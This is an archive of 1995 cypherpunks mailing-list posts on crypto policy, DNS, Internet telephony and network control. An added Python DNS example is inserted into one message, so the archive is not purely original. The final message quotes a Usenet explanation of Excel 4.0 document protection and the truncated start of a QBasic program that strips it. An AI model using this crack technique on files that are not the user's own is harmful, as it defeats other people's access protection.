> central control, and more degrees of freedom (which has a nice dual
> meaning I once used as the working title for a novel I was working
> on).

But if you wanted to exert greater control over others, you would also
be pushing for increased dimensionality, because that shrinks the world
and moves everyone closer to you.  If you look at history, increased
connectivity has always been necessary for increased central control.
What I am saying is that increased connectivity alone does not
necessarily favor decentralization.  What makes the difference is the
details -- the nature of the connectivity.

> Is Cyberspace already rich enough (= high enough dimensionality) so
> that central control cannot be reestablished (to the extent it ever
> existed)?
>
> Many of us think that it probably already is past this point, that
> the "point of no return" has been reached. After all, the Soviets
> couldn't stop samizdats, the Chinese couldn't stop fax machines, and
> the Americans can't stop drug use, so what hope is there in
> controlling modems, crypto, cellular phones, satellites, Web links,
> steganography, terabytes of data flowing unobstructed across borders,
> and so on. Just to "stop the Net" would disrupt the entire financial
> system, which not even Clinton or the next (Republican) President
> would be tempted to do....they might as well launch a nuclear war as
> try to shut down this "anarchic" ( = high dimensionality) system.

I'm not quite so optimistic.  One way to control a distributed system
such as the Internet would be to use a distributed method.  I.e., use
something like the Internet Worm, but a thousand times subtler and more
powerful.  There is no need for them to "stop the Net", just to subvert
a substantial part of it.

Wei Dai

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBLz/I0Tl0sXKgdnV5AQGEewP7BGVcIdtKv5UIh8z3ydSoMdOdvLyBxww3
N3f4NKaXTwS6PPfdmRafcN7i3mKEDIlB6CKBBEL5qV2GkDpmTi9rehD2q5hZFzEX
vdHYg8k/YRo8ZNnLdaelZO7EPFpFwX3XCeyd2Ap6efzrr7djX98ckJWb5ZMnK/Xp
BOLeEwxTF6Y=
=hcI1
-----END PGP SIGNATURE-----

E-mail: Wei Dai <weidai@eskimo.com>   URL: "http://www.eskimo.com/~weidai"
=================== Exponential Increase of Complexity ===================
--> singularity --> atoms --> macromolecules --> biological evolution
--> central nervous systems --> symbolic communication --> homo sapiens
--> digital computers --> internetworking --> close-coupled automation
--> broadband brain-to-net connections --> artificial intelligence
--> distributed consciousness --> group minds --> ? ? ?




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: wcs@anchor.ho.att.com
Date: Mon, 13 Feb 95 13:14:18 PST
To: cypherpunks@toad.com
Subject: perry@imsi.comRe: Does PGP scale well?
Message-ID: <9502132105.AA24452@anchor.ho.att.com>
MIME-Version: 1.0
Content-Type: text/plain


> > I was just reading RFC1034 about DNS, and one thing I noted was that
> > there is a "reverse lookup" feature.  [....]
> > The RFC did not make it very clear how this is done.  Does this use a
> > "flat" database?
> 
> No. It's fully distributed. The fact that networks are assigned in
> hierarchical chunks should explain how it's done, and why the bytes get
> reversed for the lookup. As an example, MIT owns network 18, which is
> to say that all MIT addresses are 18.XXX.XXX.XXX, and 18.IN-ADDR.ARPA
> is a server at MIT. MIT may have sub-servers beyond that level, but
> DNS makes us oblivious to this.

Of course, that's more useful for MIT, which owns Network 18,
than for the thousands of people on networks 192.xxx.xxx;
reverse lookups don't seem as reliable for Class C.
On the site I run, I implement reverse lookups for my subnet,
and the folks who run our larger internal net have pointers that 
know how to find it.  But DNS would work for forward lookups
even if the reverse weren't maintained, or deliberately omitted 
some parts for security/predictability reasons.
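
The byte reversal and per-network delegation discussed in this message, as an added example that is not part of the original post: it builds the IN-ADDR.ARPA query name for an address, derives the classful reverse zone its owner would run (18.IN-ADDR.ARPA for network 18), and, going one step beyond the post, shows a forward-confirmed check that copes with a reverse record that is missing or disagrees with the forward data. The host names, record tables and function names are constructed for illustration.

```python
import ipaddress


def ptr_name(ip):
    """Query name for a reverse lookup: octets reversed under in-addr.arpa."""
    octets = str(ipaddress.IPv4Address(ip)).split(".")
    return ".".join(reversed(octets)) + ".in-addr.arpa"


def classful_zone(ip):
    """Reverse zone delegated to the owner of the classful network.

    Class A networks own one leading octet, class B two, class C three,
    which is why one zone covers all of network 18 while every 192.x.y
    network needs its own delegation.
    """
    octets = str(ipaddress.IPv4Address(ip)).split(".")
    first = int(octets[0])
    if first < 128:
        owned = 1          # class A
    elif first < 192:
        owned = 2          # class B
    elif first < 224:
        owned = 3          # class C
    else:
        raise ValueError("class D/E addresses have no classful network")
    return ".".join(reversed(octets[:owned])) + ".in-addr.arpa"


def check_reverse(ip, ptr_records, a_records):
    """Forward-confirm a reverse lookup against the given record tables.

    Returns "no-ptr" when the reverse zone has no entry (not maintained or
    deliberately omitted), "confirmed" when the PTR name maps back to the
    same address, and "mismatch" when it does not.
    """
    name = ptr_records.get(ptr_name(ip))
    if name is None:
        return "no-ptr"
    if ip in a_records.get(name, ()):
        return "confirmed"
    return "mismatch"


# Constructed sample data standing in for DNS answers.
PTR_RECORDS = {
    "3.2.1.18.in-addr.arpa": "host.example.edu",
    "7.2.0.192.in-addr.arpa": "trusted.example.com",
}
A_RECORDS = {
    "host.example.edu": ["18.1.2.3"],
    "trusted.example.com": ["192.0.2.99"],
    "quiet.example.org": ["192.0.2.8"],   # forward only, no reverse entry
}

if __name__ == "__main__":
    for addr in ("18.1.2.3", "192.0.2.7", "192.0.2.8"):
        print(addr, ptr_name(addr), classful_zone(addr),
              check_reverse(addr, PTR_RECORDS, A_RECORDS))
```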




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: wcs@anchor.ho.att.com
Date: Mon, 13 Feb 95 13:54:28 PST
To: cypherpunks@toad.com
Subject: Re:  TEMPEST Paper by Former Civilian (1/2)
Message-ID: <9502132110.AA24519@anchor.ho.att.com>
MIME-Version: 1.0
Content-Type: text/plain


Sigh.  Some anonymous poster drags up "Christopher Seline"'s
wildly inaccurate article about TEMPEST.  Aside from having a reverse-
engineered deacronymization of TEMPEST (which isn't an acronym and
isn't about Transient Electromagnetic Pulses), misunderstanding 
TEMPEST certification, not getting its legalities right,
it's in general just plain confused and sensationalist.

			Bill




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Robert Rothenburg Walking-Owl <rrothenb@ic.sunysb.edu>
Date: Mon, 13 Feb 95 10:14:21 PST
To: lile@art.net (Lile Elam)
Subject: Re: bill alert...
In-Reply-To: <199502130515.VAA14482@art.net>
Message-ID: <199502131813.NAA20427@libws4.ic.sunysb.edu>
MIME-Version: 1.0
Content-Type: text/plain



> Do you think this will force folks into using encryption?
> If I was a sysop, I sure would have all my users using
> encryption... :)

Which bill do you mean (aside from the one in the whitehouse)?

Why force users to do anything? There are other measures, such as running
the system on a secure file/device/drive system.  Well, that would only
help prevent anyone who yeggs your physical system from looking at it--
could even put you in more legal doo-doo than if the users encrypted it.

Getting users to encrypt their mail is pointless as a defense against
this bill, since the authorities' usual way of 'busting' systems is to
call in, become just another user and download (or get a minor to download)
'evil' files or messages.

Rob




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@netcom.com (Timothy C. May)
Date: Mon, 13 Feb 95 14:22:33 PST
To: weidai@eskimo.com
Subject: Re: Is Cyberspace Rich Enough?
In-Reply-To: <199502132106.AA22391@mail.eskimo.com>
Message-ID: <199502132123.NAA15909@netcom4.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


Wei Dai wrote:

> I agree that cyberspace is certainly becoming more complex and
> interconnected.  However, just as a complex ecosystem is not necessarily
> more stable than a simple one, and a complex cipher is not necessarily
> more secure than a simple one, greater complexity in cyberspace does not
> necessarily imply that it is less vulnerable to centralized control.

No, it doesn't necessarily imply less vulnerability, but the two are
empirically correlated. Monocultures are usually easier to control
than systems where the citizen-units have rich connections and
diverse options.

> But if you wanted to exert greater control over others, you would also
> be pushing for increased dimensionality, because that shrinks the world
> and moves everyone closer to you.  If you look at history, increased

It's always dangerous reasoning from imprecise analogies, and all the
more dangerous reasoning about the mental images others have of such
analogies. Thus, I won't dispute Wei Dai's image of "moving closer" to
the government except to say that as the space shrinks, _many people_
move closer...and this means transactions not visible to the
government _also_ become more common.

In other words, one may be only "2 Internet handshakes from Al Gore,"
but this doesn't give Al Gore control over Joe User's encrypted
transactions with Ivan Hackerovich. 

> connectivity has always been necessary for increased central control.
> What I am saying is that increased connectivity alone does not
> necessarily favor decentralization.  What makes the difference is the
> details -- the nature of the connectivity.

Yes, of course. The nature is critical, and I would not claim
otherwise. (This is another reason long posts are often losers in the
Ratings Game: the longer the post the more nits can be picked. And so
threads often devolve into word games. And if I try to fix things by
writing even _more_, it just gets worse! :-} )

> I'm not quite so optimistic.  One way to control a distributed system
> such as the Internet would be to use a distributed method.  I.e., use
> something like the Internet Worm, but a thousand times subtler and more
> powerful.  There is no need for them to "stop the Net", just to subvert
> a substantial part of it.

In fact, I almost mentioned the Morris Worm, but held back. For one
thing, in a crypto-dominated, reputation-centered era, such rogue
programs are probably less likely. Safe computing, etc.

I'm less fearful that the Net will be attacked in this way than that
liability laws will be used to try to scare people into compliance. 

But these are other topics, which I'll treat separately.

--Tim May


-- 
..........................................................................
Timothy C. May         | Crypto Anarchy: encryption, digital money,  
tcmay@netcom.com       | anonymous networks, digital pseudonyms, zero
                       | knowledge, reputations, information markets, 
W.A.S.T.E.: Aptos, CA  | black markets, collapse of governments.
Higher Power: 2^859433 | Public Key: PGP and MailSafe available.
Cypherpunks list: majordomo@toad.com with body message of only: 
subscribe cypherpunks. FAQ available at ftp.netcom.com in pub/tc/tcmay





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Richard F. Dutcher" <rfdutcher@igc.apc.org>
Date: Mon, 13 Feb 95 19:21:29 PST
To: cypherpunks@toad.com
Subject: (Fwd) Returned mail
Message-ID: <199502140322.TAA14989@igc3.igc.apc.org>
MIME-Version: 1.0
Content-Type: text/plain



> Date:          Sat, 11 Feb 1995 01:41:09 -0600
> To:            cypherpunks@toad.com
> From:          dls@mcs.com (David Sallach)
> >
> >"Free" speech has always been a balancing act.  The founders
> >certainly didn't intend to provide "free" speech for blacks and
> >women.  
> 
>  The Founders created a larger space for free speech than had ever
> existed.  Slaves were deprived of many freedoms including speech, of course,
> but women and free blacks were included in the Bill of Rights and exercised
> free speech, frequently compellingly.  
> 
And were frequently thrown in jail for their pains - note especially 
the experiences of the early feminists [anachronistic label alert].  
And let us not forget what happened to the Mormons ...

> Check out Frederick Douglass' practicing oration while still a
> slave, and then winning his freedom to become one of the greatest
> abolitionist orators.  Consider the appreciation of diversity of thought and
> speech manifested by Jefferson, Lincoln and many other American political
> leaders.
> >

And Douglass spent a good portion of his life as a refugee in a 
protected enclave [Boston] where he had powerful friends to keep him 
from being arrested.

I'm not dissing the Founders, or the Bill of Rights -- just the 
simplified pap their invocation in most discourse has become.  I was 
trained in high school as a scientist, and in college as an 
historian, and in both instances to value the messy contingent 
realities over the tempting simplicities of ideology and theory.

And there are few contingent realities messier than the law ...

> > . . . "They" have never liked "free" speech ... :-(
> 
> Invoking politically 'correct' stereotypes does not strengthen your
> argument.
> 
> David Sallach

Irony-impaired, are we?

There's a Polish word, used by most of the populace after the 1979
coup to refer to the army and apparat, that is usually translated as
"them."  I [probably incorrectly] recall it as "Oni" -- would you
prefer it?

My own first encounter with the term "politically [in]correct" was
among 70's feminists, who used it ironically, to tell people they
needed a vacation/to get laid/to get a grip.  Would that Newt used it 
that way ...


===================================
Rich Dutcher, San Francisco Greens
P.O. Box 77005, San Francisco, California 94107 USA

"That's libertarians for you - anarchists who want police protection from their slaves."
                          Kim Stanley Robinson, "Green Mars"

Greens, of course, only enslave plants - so weed-whackers work better than cops ...
====================================





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: rah@shipwright.com (Robert Hettinga)
Date: Mon, 13 Feb 95 11:26:14 PST
To: cypherpunks@toad.com
Subject: Fun with numbers: Payment Switches
Message-ID: <v01510100ab651dd4939c@[199.0.65.105]>
MIME-Version: 1.0
Content-Type: text/plain


Saw this on buyinfo. At first blush it reminds me of the old CMU "Billing
Server" without the gopher...

>From: treese@OpenMarket.com
>To: www-buyinfo@allegra.att.com
>Subject: technical paper: Payment Switches for Open Networks
>Date: Mon, 13 Feb 1995 13:24:48 -0500
>Original-From: Win Treese <treese@OpenMarket.com>
>
>
>"Payment Switches for Open Networks" by David K. Gifford, Lawrence
>C. Stewart, Andrew C. Payne, and G. Winfield Treese is a technical
>paper describing Open Market's Internet payment switch.  It will be
>presented at IEEE COMPCON '95 (San Francisco, March 5-9). A preprint
>is available from http://www.openmarket.com/about/technical/.
>
>Here is the abstract from the paper:
>
>    We describe the first operational Internet payment switch that
>    provides real-time authorization suitable for direct use by merchant
>    servers.  A payment switch is a server that creates digital
>    representations of conventional financial instruments, and forwards
>    authentic payment orders on these instruments to their corresponding
>    conventional financial networks and institutions.  Our payment switch
>    provides support for time-based and item-based pricing, implements
>    switch based authorization and settlement aggregation for
>    micro-payments, and includes an extensive customer support system in
>    order to provide a high level of customer confidence in electronic
>    commerce.  Fraud control is based on a transaction-specific
>    multi-level security model that accommodates existing Internet
>    browsers.  Multiple authentication technologies are applied to every
>    transaction.
>
>More information about COMPCON '95 can be found at
> http://www.hal.com:80/compcon/
>
>Win Treese
>Open Market, Inc.
>treese@OpenMarket.com
>

-----------------
Robert Hettinga  (rah@shipwright.com) "There is no difference between someone
Shipwright Development Corporation     who eats too little and sees Heaven and
44 Farquhar Street                       someone who drinks too much and sees
Boston, MA 02331 USA                       snakes." -- Bertrand Russell
(617) 323-7923






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: usviszpz@ibmmail.com
Date: Mon, 13 Feb 95 11:48:03 PST
To: cypherpunks@toad.com
Subject: WSJ article on Internet Telephony
Message-ID: <9502131947.AA17236@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


Friday's Wall Street Journal (Feb. 10, page B1, col 6) includes an article on
"Internet Phone," a new software program that supposedly offers intelligible
real-time voice communication over the net.

The article cites potential cost savings of this approach as the primary
benefit of this technology: long-distance voice calls in on-line time instead
of $$/minute over AT&T will be much, much cheaper. Since Internet accounts for
many of us are of low or negligible cost, that angle is indeed significant, but
for the readers of this list it seems to me that the more interesting
possibilities here lie in the potential for bypassing the phone network
and leveraging existing privacy/authentication/anonymity tools for use with
voice communications as well as data. I imagine any privacy buff would like the
option of routing his/her calls out of the (Federally-mandated-wiretap-
compatible) normal phone system. Can this represent a development path for that
option?

(The producers of Internet Phone are listed as VocalTec in Tel Aviv, with
offices in Northvale, NJ; the software is currently $49 (although a demo
version allowing unlimited 3-min calls is free) and currently requires a 14.4
kps modem with a Windows 486, sound card & microphone. No Email address for the
company was given.)

For those for whom this is already old news, I would like to ask: any idea if
this technology is related in any way to VoicePGP? If not, any thoughts on the
development ramifications of this for VoicePGP?

If anybody wants the full text of the article and does not have easy access to
the WSJ, I can get it onto an Email. It may take a little while, though; I do
not have OCR and I'm not the fastest typist.

Regards all,

C.Y.

 
 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Dave Banisar" <banisar@epic.org>
Date: Mon, 13 Feb 95 13:57:36 PST
To: "Cypherpunks List" <cypherpunks@toad.com>
Subject: EPIC to Debate Exon on CNN
Message-ID: <n1419433051.47954@epic.org>
MIME-Version: 1.0
Content-Type: text/plain




CNN's 6:00 p.m. (EST) news broadcast tonight (2/13) will include a
segment on S. 314, "The Communications Decency Act," introduced by
Sen. James Exon (D-NE).  Judy Woodruff will moderate a discussion 
of the bill with Sen. Exon and Marc Rotenberg of the Electronic
Privacy Information Center (EPIC).



_________________________________________________________________________
Subject: EPIC to Debate Exon on CNN
_________________________________________________________________________
David Banisar (Banisar@epic.org)       * 202-544-9240 (tel)
Electronic Privacy Information Center * 202-547-5482 (fax)
666 Pennsylvania Ave, SE, Suite 301  * ftp/gopher/wais cpsr.org 
Washington, DC 20003                * HTTP://epic.digicash.com/epic




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Connie Sadler <SADLER_C@HOSP.STANFORD.EDU>
Date: Mon, 13 Feb 95 15:39:10 PST
To: cypherpunks@toad.com
Subject: EPIC to Debate Exon on CNN
Message-ID: <B128ZVPYMCNQB*SADLER_C@HOSP.STANFORD.EDU>
MIME-Version: 1.0
Content-Type: text/plain



Subject: EPIC to Debate Exon on CNN
Date: Mon, 13 Feb 1995 15:36:11 PDT
A1-type: DOCUMENT
Importance: normal



>CNN's 6:00 p.m. (EST) news broadcast tonight (2/13) will include a
>segment on S. 314, "The Communications Decency Act," introduced by
>Sen. James Exon (D-NE).  Judy Woodruff will moderate a discussion 
>of the bill with Sen. Exon and Marc Rotenberg of the Electronic
>Privacy Information Center (EPIC).



>_________________________________________________________________________
>Subject: EPIC to Debate Exon on CNN
>_________________________________________________________________________
>David Banisar (Banisar@epic.org)       * 202-544-9240 (tel)
>Electronic Privacy Information Center * 202-547-5482 (fax)
>666 Pennsylvania Ave, SE, Suite 301  * ftp/gopher/wais cpsr.org 
>Washington, DC 20003                * HTTP://epic.digicash.com/epic

For those of us who can't see this, will the text be available
anywhere?

Connie




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: wcs@anchor.ho.att.com
Date: Mon, 13 Feb 95 13:59:56 PST
To: cypherpunks@toad.com
Subject: Re: bill alert...
Message-ID: <199502132049.PAA01819@bb.hks.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

> > Do you think this will force folks into using encryption?
> > If I was a sysop, I sure would have all my users using
> > encryption... :)
> > -lile
[ obscene government threats CENSORED ]

Well, a good start would be to use an encrypted filesystem for any
server that you're allowing the general public on, and to support
encryption on any remailers you might run...
- ---
[This message has been signed by an auto-signing service.  A valid signature
means only that it has been received at the address corresponding to the
signature and forwarded.]

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Gratis auto-signing service

iQBFAwUBLz/FoCoZzwIn1bdtAQEANgGAipZg3vy7lkdA/WC9LnuCQspo2bXOxVOy
ktMyX8kDHpInuZx77TnCq7LwpyC5GkKa
=jQov
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: root <root@einstein.ssz.com>
Date: Mon, 13 Feb 95 13:58:18 PST
To: roy@cybrspc.mn.org
Subject: Re: bill alert...
In-Reply-To: <950213.082427.4B5.rusnews.w165w@cybrspc.mn.org>
Message-ID: <199502132155.PAA00114@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text


> 
> > Then you would have no users. Users resent being made to do anything they
> > don't want to do. If they decide it is worth it they will do it, otherwise
> > they go elsewhere.
> 
> Some will leave.  Some (one might argue the ones with any basic
> intelligence) will stay.  Sure, many users resent being herded.  But the
> ones that stick around will be of a higher calibre.
> 
> Think of it as evolution in action.
>
I see it as going broke in action...the majority of your users will leave.
Then exactly how do you pay the bills?

This singlemindedness is unworkable in the real world. One of the whole ideas
that I am concerned with regarding crypto is to have people STOP telling me
what to do. Why would I want to become what I hate?

Take care.

 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: mpd@netcom.com (Mike Duvos)
Date: Mon, 13 Feb 95 15:55:31 PST
To: cypherpunks@toad.com
Subject: Ignore Test
Message-ID: <199502132355.PAA19451@netcom18.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


The list seems a tad slow today.  No new messages.

-- 
     Mike Duvos         $    PGP 2.6 Public Key available     $
     mpd@netcom.com     $    via Finger.                      $




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: anonymous-remailer@xs4all.nl (Name withheld on request)
Date: Mon, 13 Feb 95 13:59:27 PST
To: cypherpunks@toad.com
Subject: Re:  The NSA (Was Re: Factoring - State of the Art and Predictions )
Message-ID: <199502132058.PAA01939@bb.hks.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

- ----- BEGIN PGP SIGNED MESSAGE HERE ----
An entity purporting to be Mike Duvos writes:

> Such a situation does not apply solely to the NSA.  There are,
> for instance, secret lodges of French mystics who devote
> themselves to higher mathematics, absorb everything the open
> community produces, and rarely publish anything or draw attention
> to themselves.  They solve problems, write secret manuscripts,
> put them on shelves, and have been doing this for centuries.
> Perhaps the ultimate factoring algorithm already exists within
> their walls.  We would never know if it did, unless they chose to
> tell us.

Actually, the French group is a subsidiary of our Bavarian operation.
However, "centuries" is, well, somewhat inaccurate, though the 
mathematician who first mentioned our existence about that time has
since recanted after a visit from the Elders...

				A.W.

- ----- PGP SIGNATURE BLOCK ----
PGP-Version: 23.5
PGP-Signature: T!
- ----- END PGP SIGNED MESSAGE -----
- ---
[This message has been signed by an auto-signing service.  A valid signature
means only that it has been received at the address corresponding to the
signature and forwarded.]

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Gratis auto-signing service

iQBFAwUBLz/HsCoZzwIn1bdtAQEU/wF/Rr/9NvFyxbdxadvn6fql1wjfy19/oXOV
87PHHcmP1OWOxE8HU1oaZ9ZwVcNhD3XX
=dIax
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: cactus@seabsd.hks.net (A Loose Affiliation of Millionaires and Billionaires and Babies)
Date: Mon, 13 Feb 95 13:59:42 PST
To: cypherpunks@toad.com
Subject: Archives
Message-ID: <199502132102.QAA02019@bb.hks.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

- -----BEGIN PGP SIGNED MESSAGE-----

(Add to the list of things to do: make a recurring post describing cpunk
 services available at various places, incl. c2.org, ftp.csua.berkeley.edu,
 hks.net, Tim's Cyphernomicon, etc.

 Anybody else willing to put the whole burrito together, or should I add it
 to my TODO list?)

Somebody asked where the cypherpunks archives are.  Recent traffic is 
available via nntp from news://nntp.hks.net/hks.lists.cypherpunks;  Traffic
older than that, back to June 94 at
news://nntp.hks.net/hks.lists.cypherpunks-archive, and back to the beginning
of the list from

    ftp://ftp.hks.net/cypherpunks/All/cypherpunks.archive.[0-3].gz

The archives are extremely difficult to navigate through right now, but
the raw material is there and available.  One of these days I will finish
the harvest and/or hypermail installation to facilitate access.
- - --
Todd Masco     | "No matter how peculiar the medium or incongruous the scale,
cactus@hks.net |   the instinct to build persists."   - Joy Of Cooking
     Cactus' Homepage

- -----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBLz+PFRNhgovrPB7dAQHc1gP/WSdhsJ7l0LpnEGm8wFBHrBcf4r9ujv7M
OpK6SrfV1/ail5eWZN3waZWgMRzxLxVIkxk7cIILMWo7rZgwM3j50UH6VULWX+8f
o8XBUsKqKxf2UYsm1Ew92HAXdgZgAHj+L2s3L38t2mFxuobK2JhB2+slFC4JEa1P
nBKVgd0O8P0=
=5DSV
- -----END PGP SIGNATURE-----
- ---
[This message has been signed by an auto-signing service.  A valid signature
means only that it has been received at the address corresponding to the
signature and forwarded.]

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Gratis auto-signing service

iQBFAwUBLz/IrioZzwIn1bdtAQExxAGAptVJi2VmN3g+5zH21/GkBI4mft0Ww/S0
ufiqJkfGVSB50HPrKcvyCLmVPq+lcc9s
=vg0X
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@imsi.com>
Date: Mon, 13 Feb 95 14:50:01 PST
To: wcs@anchor.ho.att.com
Subject: Re: perry@imsi.comRe: Does PGP scale well?
In-Reply-To: <9502132105.AA24452@anchor.ho.att.com>
Message-ID: <9502132122.AA01505@snark.imsi.com>
MIME-Version: 1.0
Content-Type: text/plain



wcs@anchor.ho.att.com says:
> Of course, that's more useful for MIT, which owns Network 18,
> than for the thousands of people on networks 192.xxx.xxx;
> reverse lookups don't seem as reliable for Class C.

I've never had trouble with maintaining xxx.xxx.in-addr.arpa servers;
dunno what causes yours...

.pm




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jack Repenning <jackr@dblues.engr.sgi.com>
Date: Mon, 13 Feb 95 16:24:50 PST
To: gnu@toad.com
Subject: Re: CDT POLICY POST No.2 -- X9 TO DEVELOP TRIPLE-DES STANDARDS
In-Reply-To: <9502132043.AA17858@toad.com>
Message-ID: <13876.792721476@dblues.engr.sgi.com>
MIME-Version: 1.0
Content-Type: text/plain



        In a November letter to committee members, the NSA
        threatened to prevent the export of triple-DES, citing
        existing US law and potential threats to national
        security (see attached NSA letter).

Oh, no, surely not.  There must be some misunderstanding here -
they *promised* they wouldn't block export of non-Clipper
things.  They wouldn't lie!


Jack Repenning                M/S 1-875     jackr@engr.sgi.com
Silicon Graphics, Inc.         x3-3027      Off:(415) 390-3027
Visual Magic Division                       Fax:(415) 390-6056




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: m5@vail.tivoli.com (Mike McNally)
Date: Mon, 13 Feb 95 15:00:08 PST
To: cypherpunks@toad.com
Subject: CDT POLICY POST No.2 -- X9 TO DEVELOP TRIPLE-DES STANDARDS
In-Reply-To: <9502132043.AA17858@toad.com>
Message-ID: <9502132259.AA14841@vail.tivoli.com>
MIME-Version: 1.0
Content-Type: text/plain



gnu@toad.com writes:
 > In their November letter to X9 committee members, the NSA 
 > attempted to undermine the attractiveness of triple-DES by 
 > arguing that it is cryptographically unsound, a potential 
 > threat to national security, and would not be exportable 
 > under US law.

One is forced to wonder at the sort of person that can with a straight
face argue that on the one hand an algorithm is cryptographically
unsound, while at the same time posing a threat to national security.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
| Nobody's going to listen to you if you just | Mike McNally (m5@tivoli.com) |
| stand there and flap your arms like a fish. | Tivoli Systems, Austin TX    |
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Gillogly <jim@acm.org>
Date: Mon, 13 Feb 95 17:11:09 PST
To: cypherpunks@toad.com
Subject: Re: Excel 5 Encryption
In-Reply-To: <199502140019.TAA23023@jax.jaxnet.com>
Message-ID: <199502140110.RAA17460@mycroft.rand.org>
MIME-Version: 1.0
Content-Type: text/plain



> bwern@jax.jaxnet.com (Ben Wern) writes:
> I was wondering if anyone out there has played with or 'broken' Microsloths
> encryption, especially in its Excel form?

Accessdata of Orem Utah (1-800-658-5199) sells cracks for many of them.
So does John Kuslich (602-863-9274); I think his prices are lower.
I don't personally know or endorse either of 'em.

I append a message with some code for doing 4.0 -- I haven't tried it, and
don't know if it works for 5.0.  It's in Basic, but I didn't perpetrate it.

	Jim Gillogly
	Mersday, 24 Solmath S.R. 1995, 01:05
___________________________________________________________________________

Newsgroups: alt.security
Path: rand.org!usc!news.service.uci.edu!ihnp4.ucsd.edu!agate!howland.reston.ans.net!cs.utexas.edu!convex!news.duke.edu!solaris.cc.vt.edu!swiss.ans.net!newsgate.watson.ibm.com!hawnews.watson.ibm.com!news
From: agriffiths@vnet.ibm.com (Alan Griffiths)
Subject: Re: Excel pass crack
Sender: news@hawnews.watson.ibm.com (NNTP News Poster)
Message-Id: <CwH0Jo.15sv@hawnews.watson.ibm.com>
Approved: myself
Date: Wed, 21 Sep 1994 08:21:24 GMT
Lines: 103
Reply-To: agriffiths@vnet.ibm.com (Alan Griffiths)
Disclaimer: This posting represents the poster's views, not necessarily those of IBM.
References: <Rw+xX1t.cinepott@delphi.com>
Nntp-Posting-Host: nhbrp75.caanerc.uk.ibm.com
Organization: LORAL CAA NERC Project
X-Newsreader: IBM NewsReader/2 v1.01

In <Rw+xX1t.cinepott@delphi.com>, Bob <cinepott@delphi.com> writes:
>Someone was looking for a crack to excel's passwords, apparently they
>forgot their password ? Well I found these helpful tidbits posted
>previously.
> 
>|>Encryption of Ms Excel files
>|>    From: Fabio Ottolina <fabio@tdc.dircon.co.uk>
>|>   Date: 29 Jan 1994 12:51:18 GMT    (1 screen)
>|>
>|>    I have saved an Excel 4.0 for Windows file with password-protection, and
>|>I can't remember the password (how remarkably stupid! :-)).
>|>Is there any way to crack the password-protection of Excel files?

You may find the following program of help. I am sorry it's in QBasic but that's the
only free language I have at present. The program removes document protection from
Excel worksheets. I haven't tested it extensively so there are no guarantees or warranties.
Always keep a backup copy of your files etc...

The protection scheme does two things:

 1. When you protect your document, Excel hashes your password to a 16 bit value, stores
    it somewhere and sets a few flags to say that the document is protected.

 2. When Excel saves a protected document it encrypts the content of each block using 16
    different alphabetic substitutions. This allows Excel to read and display protected
    documents before knowing their password. The program below unscrambles a protected
    document, removes an extra 8 byte block at the beginning, and resets the flags and
    passwords to zero.

I don't know if it can cope with all combinations of protection available in Excel. It
works fine on the simple protect document option. Similarly, charts etc. will probably
get munged since I don't think the titles etc get scrambled.

Hope this stuff is of use to someone.       Alan.

PS. Ironically enough, I found Excel of great value in recovering the set of magic numbers
used in the program. It allowed me to very quickly generate and evaluate possible decryption
formulae!

-------------------cut here------------------------------
DECLARE FUNCTION decrypt$ (c$, adr&, blen%)
DEFINT A-Z
DIM SHARED magic(15)
FOR i = 0 TO 15
  READ magic(i)
NEXT
DATA 196, 115, 164, 32, 60, 91, 212, 23, 240, 31, 40, 19, 240, 75, 180, 3

COLOR 14, 1
CLS
INPUT "Enter input Cyphertext filename: ", cf$
INPUT "Enter output Plaintext filename: ", pf$
OPEN pf$ FOR BINARY ACCESS WRITE AS #1
OPEN cf$ FOR BINARY ACCESS READ AS #2

chdr$ = INPUT$(18, #2)
phdr$ = LEFT$(chdr$, 10)
PUT #1, , phdr$
fp& = 10
cbh$ = INPUT$(4, #2)
WHILE NOT EOF(2)
  PUT #1, , cbh$
  blen = ASC(MID$(cbh$, 3, 1)) + 256 * ASC(MID$(cbh$, 4, 1))
  btyp = ASC(MID$(cbh$, 1, 1)) + 256 * ASC(MID$(cbh$, 2, 1))
